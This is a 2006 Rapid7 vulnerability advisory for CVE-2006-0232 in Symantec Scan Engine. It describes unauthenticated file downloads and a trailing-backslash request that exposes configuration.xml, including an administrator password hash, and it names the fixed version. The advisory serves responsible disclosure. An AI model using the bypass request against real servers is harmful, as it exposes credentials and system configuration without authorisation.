Back to Advisories

Advisories

Rapid7 Advisory R7-0023: Symantec Scan Engine File Disclosure Vulnerability

CVE: CVE-2006-0232

Summary

April 21, 2006 - There is a vulnerability in Symantec Scan Engine which allows unauthenticated remote users to download any file located under the Symantec Scan Engine installation directory. For instance the configuration file, the scanning logs, as well as the current virus definitions can all be accessed by any remote user using regular or specially crafted HTTP requests.

Nexpose, Rapid7's award-winning vulnerability assessment platform, checks for this vulnerability and other vulnerabilities we have discovered in Symantec Scan Engine. Visit http://www.rapid7.com to register for a free demo of Nexpose.

Affected system(s):

KNOWN VULNERABLE:

  • Symantec Scan Engine v5.0.0.24

KNOWN FIXED:

  • Symantec Scan Engine v5.1.0.7

UNKNOWN (PROBABLY VULNERABLE):

  • All v5.0.x.x
  • Earlier versions

Vendor Info

Symantec Corporation
http://www.symantec.com

Symantec was notified of this vulnerability on January 17, 2006. They acknowledged the vulnerability, then provided us with a fixed version. Rapid7's advisory was publicly released on April 21, 2006.

Detailed Analysis

Symantec Scan Engine stores multiple files inside its web root (the default directory is "C:\Program Files\Symantec\Scan Engine"). Most of the files are accessible by any unauthenticated user via regular URLs. For example the following URLs will download the log and corresponding data file for October 17th, 2005:

http://x.x.x.x:8004/log/SSE20051017.log
http://x.x.x.x:8004/log/SSE20051017.dat

In the same way, virus definitions can be accessed from:

http://x.x.x.x:8004/Definitions/AntiVirus/VirusDefs/VIRSCAN1.DAT
http://x.x.x.x:8004/Definitions/AntiVirus/VirusDefs/VIRSCAN2.DAT

Such sensitive knowledge of installed virus definitions will allow an attacker to determine what viruses can be used to infect the network without detection.

Files ending with the '.xml' extension are protected by the HTTP daemon. However, the protection can be easily defeated by appending a trailing backslash to the filename. For example the configuration file configuration.xml, which contains the administrator's password hash, can be accessed by the following HTTP request:

GET /configuration.xml\ HTTP/1.0

The above request will yield the following configuration snippet:

<system>
<TempDir value="C:\Program Files\Symantec\Scan Engine\temp\"/>
[...]
<InstallDir value="C:\Program Files\Symantec\Scan Engine\"/>
<LoadMaximumQueuedClients value="100"/>
<admin>
<port value="8004"/>
<sslport value="8005"/>
<ip value=""/>
<timeout value="300"/>
<password value=
"8369951FB31356D389FBEE4B52F6A7BB51AAE8FBE4B8DB29D249F347C3426D19"/>
</admin>
</system>

Credit

This vulnerability was discovered by Joe Testa of Rapid7.

Solution

Upgrade to Symantec Scan Engine v5.1.0.7 or later. Another option is to disable the web interface of the scan engine by logging in, setting the TCP port from 8004 to 0, and then restarting the Scan Engine.

Disclaimer & Copyright

Rapid7, LLC is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.

This advisory Copyright (C) 2006 Rapid7, LLC. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.